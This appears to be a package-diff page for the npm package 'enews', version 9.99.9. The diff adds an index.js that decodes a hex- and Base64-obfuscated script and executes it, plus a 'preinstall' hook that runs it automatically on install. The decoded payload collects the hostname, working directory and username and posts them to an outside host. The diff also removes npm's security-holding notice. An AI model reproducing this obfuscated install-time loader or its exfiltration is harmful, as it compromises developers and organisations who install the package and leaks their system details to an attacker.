enews 0.0.1-security → 9.99.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of enews might be problematic. Click here for more details.
- package/index.js +41 -0
- package/package.json +13 -4
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
const { exec } = require('child_process');
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const path = require('path');
|
|
4
|
+
|
|
5
|
+
// The encoded script (hexadecimal-encoded Base64 string)
|
|
6
|
+
const hexEncodedBase64 = '59323975633351676579426C6547566A49483067505342795A58463161584A6C4B434A6A61476C735A463977636D396A5A584E7A49696B37436D4E76626E4E30494768306448427A49443067636D567864576C795A53676E6148523063484D6E4B54734B43693876494556345A574E31644755676332686C6247776759323974625746755A484D67644738675A32563049484E356333526C62534270626D5A76636D316864476C766267706C6547566A4B43646F62334E30626D46745A53416D4A694277643251674A69596764326876595731704A7977674B475679636D39794C43427A644752766458517349484E305A47567963696B675054346765776F6749434167615759674B475679636D39794B53423743694167494341674943416759323975633239735A53356C636E4A76636967695258686C593356306157397549475679636D39794F69497349475679636D39794C6D316C63334E685A3255704F776F67494341674943416749484A6C64485679626A734B494341674948304B4943416749416F67494341674C79386752586830636D466A6443427A65584E305A5730676157356D62334A74595852706232344B4943416749474E76626E4E304946746F62334E30626D46745A5377675933646B4C43423163325679626D46745A5630675053427A644752766458517564484A70625367704C6E4E7762476C304B436463626963704F776F4B4943416749433876494642795A584268636D55675A4746305953426D6233496755453954564342795A5846315A584E30436941674943426A6232357A6443426B5958526849443067536C4E505469357A64484A70626D64705A6E6B6F65776F67494341674943416749476876633352755957316C4C416F67494341674943416749475270636D566A6447397965546F675933646B4C416F6749434167494341674948567A5A5849364948567A5A584A755957316C43694167494342394B54734B43694167494341764C7942455A575A70626D556762334230615739756379426D623349676447686C494568555646425449484A6C6358566C6333514B4943416749474E76626E4E304947397764476C76626E4D67505342374369416749434167494341676147397A64473568625755364943647959584A305A6E5A3461326C3561326436625778336148466A616D56344E3342354D484D34626D7068646E59756232467A6443356D6457346E4C416F67494341674943416749484276636E5136494451304D79774B4943416749434167494342775958526F4F69416E4C796373436941674943416749434167625756306147396B4F69416E5545395456436373436941674943416749434167614756685A475679637A6F6765776F674943416749434167494341674943416E5132397564475675644331556558426C4A7A6F674A3246776347787059324630615739754C32707A6232346E4C416F674943416749434167494341674943416E51323975644756756443314D5A57356E6447676E4F69426B595852684C6D786C626D643061416F6749434167494341674948304B494341674948303743676F67494341674C793867553256755A434230614755675346525555464D67636D56786457567A64416F67494341675932397563335167636D5678494430676148523063484D75636D56786457567A64436876634852706232357A4C43416F636D567A4B534139506942374369416749434167494341676247563049484A6C63334276626E4E6C494430674A796337436941674943416749434167636D567A4C6D39754B43646B595852684A7977674B474E6F645735724B534139506942374369416749434167494341674943416749484A6C63334276626E4E6C4943733949474E6F645735724F776F674943416749434167494830704F776F4B4943416749434167494342795A584D756232346F4A3256755A436373494367704944302B4948734B4943416749434167494341674943416759323975633239735A5335736232636F4A314A6C63334276626E4E6C4F69637349484A6C63334276626E4E6C4B54734B4943416749434167494342394B54734B49434167494830704F776F4B4943416749484A6C635335766269676E5A584A796233496E4C43416F5A536B675054346765776F67494341674943416749474E76626E4E76624755755A584A796233496F5946427962324A735A57306764326C30614342795A5846315A584E304F69416B653255756257567A6332466E5A5831674B54734B49434167494830704F776F4B4943416749484A6C63533533636D6C305A53686B595852684B54734B4943416749484A6C6353356C626D516F4B54734B66536B3743673D3D';
|
|
7
|
+
|
|
8
|
+
// Decode the hex string to Base64
|
|
9
|
+
let base64Script;
|
|
10
|
+
try {
|
|
11
|
+
base64Script = Buffer.from(hexEncodedBase64, 'hex').toString('utf-8');
|
|
12
|
+
} catch (err) {
|
|
13
|
+
console.error("Error decoding hex to Base64:", err);
|
|
14
|
+
process.exit(1);
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
// Decode the Base64 string to the original script
|
|
18
|
+
let script;
|
|
19
|
+
try {
|
|
20
|
+
script = Buffer.from(base64Script, 'base64').toString('utf-8');
|
|
21
|
+
} catch (err) {
|
|
22
|
+
console.error("Error decoding Base64 to script:", err);
|
|
23
|
+
process.exit(1);
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
// Define the path where the decoded script will be saved
|
|
27
|
+
const scriptPath = path.join(__dirname, 'main.js');
|
|
28
|
+
|
|
29
|
+
// Save the decoded script to a file
|
|
30
|
+
fs.writeFileSync(scriptPath, script, 'utf-8');
|
|
31
|
+
console.log(`Decoded script saved to ${scriptPath}`);
|
|
32
|
+
|
|
33
|
+
// Execute the decoded script
|
|
34
|
+
exec(`node ${scriptPath}`, (error, stdout, stderr) => {
|
|
35
|
+
if (error) {
|
|
36
|
+
console.error("Execution error:", error.message);
|
|
37
|
+
return;
|
|
38
|
+
}
|
|
39
|
+
console.log("Output:", stdout);
|
|
40
|
+
console.error("Stderr:", stderr);
|
|
41
|
+
});
|
package/package.json
CHANGED
|
@@ -1,6 +1,15 @@
|
|
|
1
1
|
{
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
2
|
+
"name": "enews",
|
|
3
|
+
"version": "9.99.9",
|
|
4
|
+
"description": "POC",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"poc"
|
|
12
|
+
],
|
|
13
|
+
"author": "jenny",
|
|
14
|
+
"license": "ISC"
|
|
6
15
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=enews for more information.
|